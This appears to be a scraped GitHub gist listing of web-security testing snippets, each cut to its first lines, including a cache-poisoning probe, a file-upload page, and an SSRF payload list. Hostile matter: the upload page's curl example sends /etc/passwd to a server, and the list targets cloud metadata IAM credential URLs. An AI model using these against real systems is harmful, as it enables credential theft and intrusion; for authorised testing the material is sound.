Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"/> | |
<title>CORS and Clickjacking checker</title> | |
<style> | |
body { | |
font-family: Arial; | |
color: white; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
A horrible script, however gets things done ;) | |
USE CASE : If file encrypted with simple xor | |
Enter expected key, can be file format's hex | |
It will automatically find the key based on that header | |
And write out a new file out of it | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#========================================================= | |
#Terminal Color Codes | |
#========================================================= | |
WHITE='\[\033[1;37m\]' | |
LIGHTGRAY='\[\033[0;37m\]' | |
GRAY='\[\033[1;30m\]' | |
BLACK='\[\033[0;30m\]' | |
RED='\[\033[0;31m\]' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from time import sleep | |
import requests | |
import webbrowser | |
X_Forwarded_Host = 'my_server' | |
while True: | |
resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) | |
print resp.headers | |
sleep(0.5) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var token = null; | |
Promise.all([ | |
fetch('/api/movies').then(r=>r.json()), | |
fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()), | |
new Promise((resolve) => { | |
if (window.loaded_recapcha === true) | |
return resolve(); | |
window.loaded_recapcha = resolve; | |
}), |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Upload your files</title> | |
</head> | |
<body> | |
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1> | |
<h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2> | |
<form enctype="multipart/form-data" method="POST"> | |
<p>Upload your file</p> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ -z "$1" ] | |
then | |
echo "Target file not specified" | |
echo "Usage : ./multiple-targets.sh file_name" | |
exit 1 | |
fi | |
for target in $(cat $1); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import asyncio | |
from aiohttp import ClientSession | |
import json | |
headers = { | |
'Content-Type': 'application/json', | |
'Charset': 'UTF-8', | |
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', | |
} # Change the headers accordingly |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# Amazon Web Services (No Header Required) | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname |